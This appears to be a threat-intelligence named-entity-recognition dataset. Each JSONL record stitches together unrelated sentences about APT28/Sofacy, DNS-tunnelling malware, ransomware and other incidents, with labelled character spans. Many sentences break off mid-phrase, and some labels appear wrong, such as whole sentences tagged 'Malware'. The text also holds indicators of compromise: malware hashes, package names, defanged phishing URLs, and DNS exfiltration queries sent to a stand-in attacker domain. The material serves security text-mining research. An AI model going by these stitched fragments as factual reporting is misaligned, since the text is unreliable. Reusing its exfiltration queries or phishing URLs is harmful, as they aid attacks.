{"text": "Perhaps more information on XLoader will be known in the future . We assess that APT28 is most likely sponsored by the Russian government . Once written, the send operations . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 81, "end": 86, "label": "Organization"}, {"start": 216, "end": 220, "label": "Organization"}, {"start": 232, "end": 239, "label": "Organization"}]}
{"text": "For now , users can make the best of the knowledge they have now to significantly reduce the effectivity of such malware . Given the available data , we assess that APT28 's work is sponsored by the Russian government . Similar to text mode receiver, after AdrGen builds the string, a function to manually build and send the DNS query packet is . Suspicious Login Patterns on NetScaler", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 257, "end": 263, "label": "Malware"}, {"start": 325, "end": 328, "label": "Indicator"}, {"start": 347, "end": 385, "label": "Indicator"}]}
{"text": "Users of iOS can remove the malicious profile using the Apple Configurator 2 , Apple \u2019 s official iOS helper app for managing Apple devices . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election . The text mode sender uses the same hardcoded transaction ID 0xa4a3; however, instead of sending queries for TXT resource records, the malware uses A resource . Rhysida will enumerate through directories and files in directories starting from \u201c A : \u201d to \u201c Z : \u201d drives , ensure they \u2019re missing from the \u201c exclude list \u201d and then \u201c process , \u201d i.e. , encrypt the files .", "spans": [{"start": 9, "end": 12, "label": "System"}, {"start": 56, "end": 61, "label": "Organization"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 98, "end": 101, "label": "System"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 268, "end": 276, "label": "Organization"}, {"start": 281, "end": 301, "label": "Organization"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 366, "end": 376, "label": "Organization"}, {"start": 396, "end": 403, "label": "Organization"}, {"start": 408, "end": 419, "label": "Organization"}, {"start": 681, "end": 688, "label": "Malware"}, {"start": 694, "end": 788, "label": "Indicator"}, {"start": 791, "end": 888, "label": "Indicator"}]}
{"text": "Following simple best practices , like strictly downloading applications or any files from trusted sources and being wary of unsolicited messages , can also prevent similar attacks from compromising devices . The targets of TG-4127 include military , government and defense sectors . As with the text mode receiver, the query is made with a direct connection to the controller IP address as opposed to allowing the query to propagate the native DNS . Earlier campaigns used an executable downloader , while the later ones used DLLs for the next stage .", "spans": [{"start": 224, "end": 231, "label": "Organization"}, {"start": 240, "end": 248, "label": "Organization"}, {"start": 251, "end": 261, "label": "Organization"}, {"start": 266, "end": 281, "label": "Organization"}, {"start": 445, "end": 448, "label": "Indicator"}, {"start": 477, "end": 498, "label": "System"}, {"start": 527, "end": 531, "label": "System"}]}
{"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh \u4f50\u5ddd\u6025\u4fbf 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK . If the send function is being invoked in ping mode, the process described above is followed; however, instead of manually building and transmitting the DNS query, the [System.Net.Dns]::GetHostAddresses method is . In the months leading up to and after Russia \u2019s illegal further invasion began , Ukraine experienced a series of disruptive cyber operations , including website defacements , distributed denial - of - service ( DDoS ) attacks , and cyber attacks to delete data from computers belonging to government and private entities \u2013 all part of the Russian playbook .", "spans": [{"start": 50, "end": 114, "label": "Indicator"}, {"start": 115, "end": 130, "label": "Indicator"}, {"start": 143, "end": 207, "label": "Indicator"}, {"start": 208, "end": 223, "label": "Indicator"}, {"start": 229, "end": 293, "label": "Indicator"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 344, "end": 363, "label": "System"}, {"start": 392, "end": 400, "label": "System"}, {"start": 409, "end": 435, "label": "System"}, {"start": 449, "end": 458, "label": "System"}, {"start": 613, "end": 616, "label": "Indicator"}, {"start": 756, "end": 763, "label": "Organization"}, {"start": 778, "end": 815, "label": "Organization"}, {"start": 1010, "end": 1030, "label": "Organization"}]}
{"text": "com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo \u4f50\u5ddd\u6025\u4fbf cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7 While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government . With that method, the malware\u2019s query will traverse the native DNS architecture as opposed to the victim making a direct connection to the . Kaspersky \u2019s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 13, "end": 21, "label": "Organization"}, {"start": 22, "end": 86, "label": "Indicator"}, {"start": 87, "end": 102, "label": "Indicator"}, {"start": 115, "end": 179, "label": "Indicator"}, {"start": 180, "end": 193, "label": "Indicator"}, {"start": 199, "end": 263, "label": "Indicator"}, {"start": 270, "end": 277, "label": "Organization"}, {"start": 592, "end": 595, "label": "Indicator"}, {"start": 670, "end": 726, "label": "Organization"}]}
{"text": "jp.co.sagawa.SagawaOfficialApp \u4f50\u5ddd\u6025\u4fbf Malicious URLs : hxxp : //38 [ . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . The send function uses several counters to maintain various pieces of information used to control the flow of . shellcode Download a shellcode and run by injecting it in a target process .", "spans": [{"start": 0, "end": 30, "label": "Indicator"}, {"start": 53, "end": 68, "label": "Indicator"}, {"start": 69, "end": 72, "label": "Organization"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 353, "end": 362, "label": "Malware"}]}
{"text": "] 27 [ . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government . An exception counter is used to track the number of exceptions and will exit the send loop if a threshold is . In one exchange on Aug. 16 , 2012 , Ashley Madison \u2019s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 339, "end": 371, "label": "Organization"}]}
{"text": "] 99 [ . Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them . The send counter is used to track the number of chunks sent to the . Given Sandworm \u2019s global threat activity and novel OT capabilties , we urge OT asset owners to take action to mitigate this threat .", "spans": [{"start": 47, "end": 52, "label": "Organization"}, {"start": 57, "end": 62, "label": "Organization"}, {"start": 146, "end": 156, "label": "Organization"}, {"start": 317, "end": 351, "label": "Organization"}, {"start": 387, "end": 389, "label": "Organization"}]}
{"text": "] 11/xvideo/ hxxp : //apple-icloud [ . Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests . An additional counter exists to handle cases where the file being sent is larger than 250 . The purpose of these attacks and their focus on IT and communication companies is believed to be to facilitate supply chain attacks on their clients .", "spans": [{"start": 13, "end": 38, "label": "Indicator"}, {"start": 61, "end": 66, "label": "Organization"}, {"start": 287, "end": 317, "label": "Organization"}]}
{"text": "] qwe-japan [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is initialized to 0 and read from the fourth octet of the A record returned by the . The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": [{"start": 153, "end": 164, "label": "Organization"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 180, "end": 196, "label": "Organization"}, {"start": 199, "end": 213, "label": "Organization"}, {"start": 220, "end": 230, "label": "Organization"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 425, "end": 441, "label": "Organization"}, {"start": 446, "end": 457, "label": "Organization"}, {"start": 460, "end": 485, "label": "Organization"}, {"start": 488, "end": 509, "label": "Organization"}, {"start": 514, "end": 528, "label": "Organization"}]}
{"text": "] com hxxp : //apple-icloud [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is also passed to the AdrGen function as the part number parameter and is visible in the query string as depicted below: Query: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil , Response: 39.2.3.1 , Query: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil , Response: 39.2.3.2 , Query: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil . Attacks start with VBA code to decode the next malware stage All campaigns start with Microsoft Office documents , which are possibly sent to the targets as email attachments .", "spans": [{"start": 6, "end": 31, "label": "Indicator"}, {"start": 169, "end": 180, "label": "Organization"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 198, "end": 214, "label": "Organization"}, {"start": 217, "end": 231, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 344, "end": 350, "label": "Malware"}, {"start": 450, "end": 567, "label": "Indicator"}, {"start": 580, "end": 588, "label": "Indicator"}, {"start": 598, "end": 717, "label": "Indicator"}, {"start": 730, "end": 738, "label": "Indicator"}, {"start": 748, "end": 868, "label": "Indicator"}, {"start": 932, "end": 945, "label": "Organization"}]}
{"text": "] qwq-japan [ . Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine . When the send loop has fewer than 60 bytes to send (e.g., a small file or the last part of a file), the send function transmits the remaining bytes with a shorter data . Typically , they steal information , including intellectual property , personally identifying information , and money to fund or further espionage and exploitation causes .", "spans": [{"start": 88, "end": 93, "label": "Organization"}]}
{"text": "] com/ hxxp : //apple-icloud [ . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests . When there are no more bytes to send, a hardcoded file end marker COCTabCOCT is sent in the data section and the send loop will be . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": [{"start": 7, "end": 32, "label": "Indicator"}, {"start": 76, "end": 81, "label": "Organization"}]}
{"text": "] zqo-japan [ . After compromising a political organization , APT28 will steal internal data . The controller responds with the 253.25.42.87 A record . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 37, "end": 59, "label": "Organization"}, {"start": 62, "end": 67, "label": "Organization"}, {"start": 128, "end": 140, "label": "Indicator"}, {"start": 152, "end": 183, "label": "Organization"}, {"start": 195, "end": 375, "label": "Indicator"}, {"start": 393, "end": 405, "label": "Organization"}]}
{"text": "] com/ hxxp : //files.spamo [ . On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian Government sponsors APT28 . Query: 239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil , Response: 39.2.3.56 , Query: 05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil , Response: 253.25.42.87 . Additionally , while KillNet has targeted NATO countries and organizations since early to mid-2022 , it declared a focused operation against NATO in early 2023 and created a Telegram channel in April 2023 dedicated to this operation .", "spans": [{"start": 7, "end": 31, "label": "Indicator"}, {"start": 60, "end": 91, "label": "Organization"}, {"start": 94, "end": 97, "label": "Organization"}, {"start": 138, "end": 141, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 279, "end": 375, "label": "Indicator"}, {"start": 388, "end": 397, "label": "Indicator"}, {"start": 407, "end": 473, "label": "Indicator"}, {"start": 486, "end": 498, "label": "Indicator"}, {"start": 534, "end": 557, "label": "Organization"}]}
{"text": "] jp/\u4f50\u5ddd\u6025\u4fbf.apk hxxp : //mailsa-qae [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . Once an A record response is received by the malware containing 253.25.42.87 , several variables are set in preparation to exit the send . Currently , Mandiant can neither validate claims related to Zarya \u2019s hacking capabilities , nor those related to the group \u2019s potential links to the FSB .", "spans": [{"start": 14, "end": 37, "label": "Indicator"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 315, "end": 327, "label": "Indicator"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 539, "end": 542, "label": "Organization"}]}
{"text": "] com hxxp : //mailsa-qaf [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . After the send operation is complete, the lock file for the current run is deleted and the script . In addition , Hack520 \u2019s tweets always show photos of the same animal , which is likely his pet pig .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 48, "end": 55, "label": "Organization"}, {"start": 65, "end": 70, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 358, "end": 365, "label": "Organization"}]}
{"text": "] com hxxp : //mailsa-qau [ . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . Many of the capabilities discovered in Glimpse were also present in the malware analyzed in part one of this . It seems that the legitimate macro code is used to calculate some values in the spreadsheets , but the legitimate functions are changed to call the function that starts the infection process .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 30, "end": 35, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 64, "end": 74, "label": "Organization"}, {"start": 153, "end": 160, "label": "Malware"}, {"start": 239, "end": 317, "label": "Malware"}, {"start": 324, "end": 415, "label": "Malware"}]}
{"text": "] com hxxp : //mailsa-qaw [ . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism . Glimpse added the ability to use an alternate DNS resource record type (TXT) as opposed to solely relying on A resource records for DNS . None Deploy advanced endpoint detection and response ( EDR ) tools to all endpoints to detect web services spawning PowerShell or command line processes .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 51, "end": 56, "label": "Organization"}, {"start": 254, "end": 261, "label": "Malware"}, {"start": 300, "end": 303, "label": "Indicator"}, {"start": 386, "end": 389, "label": "Indicator"}]}
{"text": "] com hxxp : //mailsa-wqe [ . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government . Using TXT resource records enabled the actors to provide tasking in fewer transactions due to the amount of data that can be transmitted in a TXT . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 91, "end": 96, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 418, "end": 423, "label": "Organization"}, {"start": 426, "end": 433, "label": "Organization"}]}
{"text": "] com hxxp : //mailsa-wqo [ . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor . To support this capability, the adversaries chose to manually craft the DNS queries and communicate directly with the controller as opposed to using existing .NET DNS . Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman \u2019s messages \u2014 three years worth .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 65, "end": 70, "label": "Organization"}, {"start": 115, "end": 130, "label": "Organization"}, {"start": 205, "end": 208, "label": "Indicator"}, {"start": 291, "end": 295, "label": "Indicator"}, {"start": 296, "end": 299, "label": "Indicator"}, {"start": 317, "end": 331, "label": "Organization"}]}
{"text": "] com hxxp : //mailsa-wqp [ . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations . The differences between PoisonFrog and Glimpse highlight the ease at which adversaries can modify their tools to meet their end . The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 84, "end": 89, "label": "Organization"}, {"start": 169, "end": 179, "label": "Malware"}, {"start": 184, "end": 191, "label": "Malware"}, {"start": 279, "end": 291, "label": "Organization"}, {"start": 356, "end": 369, "label": "Organization"}, {"start": 374, "end": 392, "label": "Organization"}]}
{"text": "] com hxxp : //mailsa-wqq [ . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . With regard to detection, several methods can be used to identify this type of C2 . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 34, "end": 49, "label": "Organization"}, {"start": 80, "end": 111, "label": "Organization"}, {"start": 114, "end": 117, "label": "Organization"}, {"start": 162, "end": 165, "label": "Organization"}, {"start": 309, "end": 317, "label": "Organization"}, {"start": 322, "end": 332, "label": "Organization"}, {"start": 450, "end": 452, "label": "System"}, {"start": 492, "end": 504, "label": "Organization"}, {"start": 522, "end": 559, "label": "Malware"}, {"start": 605, "end": 620, "label": "Malware"}, {"start": 636, "end": 654, "label": "System"}]}
{"text": "] com hxxp : //mailsa-wqu [ . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . Performing entropy calculations on subdomain labels can help highlight the amount of randomness in a label, but this is just one of many possible data analysis points, since a standalone feature may not be enough to determine whether traffic is . More information TunnelVision has been observed exploiting Fortinet FortiOS CVE201813379 , Microsoft Exchange ProxyShell and the recent Log4Shell vulnerabilities .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 34, "end": 39, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 202, "end": 212, "label": "Organization"}, {"start": 566, "end": 586, "label": "Vulnerability"}, {"start": 589, "end": 618, "label": "Vulnerability"}, {"start": 634, "end": 643, "label": "Vulnerability"}]}
{"text": "] com hxxp : //mailsa-wqw [ . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia . The IronDefense Network Traffic Analysis platform combines several behavioral detection methods alongside historical network information to detect the C2 techniques used by Glimpse and other . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 38, "end": 50, "label": "Organization"}, {"start": 53, "end": 60, "label": "Organization"}, {"start": 67, "end": 74, "label": "Organization"}, {"start": 413, "end": 415, "label": "System"}, {"start": 435, "end": 442, "label": "Malware"}]}
{"text": "] com hxxp : //nttdocomo-qae [ . Several sources consider APT28 a group of CyberMercs based in Russia . Carbon Black TAU ThreatSight Analysis GandCrab and Ursnif . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 104, "end": 132, "label": "Organization"}, {"start": 142, "end": 150, "label": "Malware"}, {"start": 155, "end": 161, "label": "Malware"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 250, "end": 272, "label": "Organization"}, {"start": 284, "end": 292, "label": "Organization"}]}
{"text": "] com hxxp : //nttdocomo-qaq [ . The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada . The Carbon Black ThreatSight team observed an interesting campaign over the last month . One initiative in the European Union has helped more than 1.5 million ransomware victims .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 56, "end": 61, "label": "Organization"}, {"start": 185, "end": 209, "label": "Organization"}, {"start": 292, "end": 306, "label": "Organization"}, {"start": 340, "end": 358, "label": "Organization"}]}
{"text": "] com hxxp : //nttdocomo-qaq [ . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian . ThreatSight worked with the Threat Analysis Unit ( TAU ) to research the campaign . Beyond basic cybersecurity hygiene , including auditing current IT environments for vulnerabilities , implementing needed patches and regularly employing backups , its imperative to have multifactor authentication as a minimum on any externalfacing RDP , whilst preferably removing externalfacing RDP altogether .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 119, "end": 127, "label": "Organization"}, {"start": 131, "end": 139, "label": "Organization"}, {"start": 186, "end": 197, "label": "Organization"}, {"start": 214, "end": 234, "label": "Organization"}, {"start": 237, "end": 240, "label": "Organization"}]}
{"text": "] com/aa hxxp : //nttdocomo-qar [ . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin . This report is being released to help researchers and security practitioners combat this campaign as new samples are being discovered in the wild daily . They choses the appropriate DLL by passing a flag in the first Argument .", "spans": [{"start": 9, "end": 35, "label": "Indicator"}, {"start": 79, "end": 86, "label": "Organization"}, {"start": 116, "end": 121, "label": "Organization"}, {"start": 305, "end": 376, "label": "Malware"}]}
{"text": "] com hxxp : //nttdocomo-qat [ . Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations . This attack , if successful , can infect a compromised system with both Ursnif malware and GandCrab ransomware . Create NSPPE core dump files on NetScaler ( instructions from vendor ) .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 96, "end": 104, "label": "Organization"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 323, "end": 329, "label": "Malware"}, {"start": 342, "end": 350, "label": "Malware"}]}
{"text": "] com hxxp : //nttdocomo-qaw [ . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others . The overall attack leverages several different approaches , which are popular techniques amongst red teamers , espionage focused adversaries , and large scale criminal campaigns . Adversaries may utilize many different protocols , including those used for web browsing , transferring files , electronic mail , or DNS .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 47, "end": 59, "label": "Organization"}, {"start": 130, "end": 139, "label": "System"}, {"start": 142, "end": 146, "label": "System"}, {"start": 149, "end": 157, "label": "System"}, {"start": 160, "end": 164, "label": "System"}, {"start": 364, "end": 375, "label": "Organization"}]}
{"text": "] com hxxp : //sagawa-reg [ . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others . This campaign originally came in via phishing emails that contained an attached Word document with embedded macros , Carbon Black located roughly 180 variants in the wild . Problems also arise when organizations turn a blind eye to the usage of commercial spyware .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 44, "end": 56, "label": "Organization"}, {"start": 127, "end": 136, "label": "System"}, {"start": 139, "end": 143, "label": "System"}, {"start": 150, "end": 156, "label": "System"}, {"start": 163, "end": 172, "label": "System"}, {"start": 177, "end": 185, "label": "System"}, {"start": 222, "end": 229, "label": "System"}, {"start": 242, "end": 246, "label": "System"}, {"start": 277, "end": 285, "label": "System"}, {"start": 422, "end": 435, "label": "System"}, {"start": 459, "end": 471, "label": "Organization"}, {"start": 540, "end": 553, "label": "Organization"}]}
{"text": "] com/ hxxp : //www [ . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab variant . The URLs provided access to the C2s , along with commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": [{"start": 7, "end": 23, "label": "Indicator"}, {"start": 28, "end": 40, "label": "Organization"}, {"start": 84, "end": 98, "label": "Vulnerability"}, {"start": 116, "end": 123, "label": "System"}, {"start": 130, "end": 150, "label": "System"}, {"start": 215, "end": 225, "label": "System"}, {"start": 300, "end": 306, "label": "Malware"}, {"start": 311, "end": 319, "label": "Malware"}]}
{"text": "] 711231 [ . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . This campaign has been discussed at a high level by other researchers publicly . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 62, "end": 76, "label": "Vulnerability"}, {"start": 94, "end": 101, "label": "System"}, {"start": 108, "end": 128, "label": "System"}, {"start": 247, "end": 256, "label": "System"}, {"start": 262, "end": 277, "label": "System"}, {"start": 289, "end": 292, "label": "System"}]}
{"text": "] com hxxp : //www [ . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Carbon Black product specific content can be located in the User Exchange . certutil.exe", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 27, "end": 32, "label": "Organization"}, {"start": 76, "end": 90, "label": "Vulnerability"}, {"start": 108, "end": 115, "label": "System"}, {"start": 122, "end": 142, "label": "System"}, {"start": 175, "end": 187, "label": "Organization"}, {"start": 235, "end": 248, "label": "System"}, {"start": 251, "end": 263, "label": "System"}]}
{"text": "] 759383 [ . Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing . In this campaign the attackers used a MS Word document ( .doc format ) to deliver the initial stages . None Use of open source libraries for protocol implementation : The availability of open source projects that implement OT protocols can lower the barrier of entry for actors attempting to interact with OT devices .", "spans": [{"start": 41, "end": 45, "label": "System"}, {"start": 48, "end": 57, "label": "System"}, {"start": 60, "end": 66, "label": "System"}, {"start": 188, "end": 195, "label": "System"}, {"start": 207, "end": 211, "label": "Indicator"}, {"start": 265, "end": 314, "label": "System"}, {"start": 337, "end": 385, "label": "System"}]}
{"text": "] com hxxp : //www [ . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 . It should be noted that out of the roughly 180 Word variants that were located by Carbon Black , the biggest difference in the documents was the metadata and junk data located in the malicious macros . However , we note that the wiper deployment was limited to the victim \u2019s IT environment and did not impact the hypervisor or the SCADA virtual machine .", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 85, "end": 103, "label": "Organization"}, {"start": 129, "end": 140, "label": "Organization"}, {"start": 190, "end": 194, "label": "System"}, {"start": 225, "end": 237, "label": "Organization"}, {"start": 474, "end": 495, "label": "System"}]}
{"text": "] 923525 [ . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . However the metadata clearly showed that the documents prepared for this campaign were initially saved on December 17 , 2018 and have continued to be updated through January 21 , 2019 . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 59, "end": 78, "label": "Vulnerability"}, {"start": 87, "end": 103, "label": "System"}, {"start": 104, "end": 113, "label": "System"}, {"start": 408, "end": 444, "label": "Vulnerability"}]}
{"text": "] com hxxp : //www [ . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder . Several metadata fields ( specifically title , subject , author , comments , manager , and company ) appear to have been populated with different data sets . The top most targeted organizations included those from technology and social media , NATO , and the transportation sector .", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 124, "end": 133, "label": "System"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 395, "end": 416, "label": "Organization"}]}
{"text": "] 923915 [ . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread . For example the subject in all the samples was a combination of a US state and a common first name ( like Utah Erick or Tennessee Dayna ) . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": [{"start": 31, "end": 45, "label": "System"}, {"start": 66, "end": 78, "label": "Organization"}, {"start": 92, "end": 99, "label": "System"}, {"start": 290, "end": 300, "label": "Organization"}]}
{"text": "] com hxxp : //www [ . As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 . For this post the following sample was analyzed . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 72, "end": 83, "label": "System"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 109, "end": 119, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 130, "end": 139, "label": "Organization"}, {"start": 142, "end": 152, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}, {"start": 198, "end": 208, "label": "Organization"}, {"start": 352, "end": 359, "label": "Organization"}, {"start": 406, "end": 422, "label": "Organization"}, {"start": 492, "end": 496, "label": "Organization"}]}
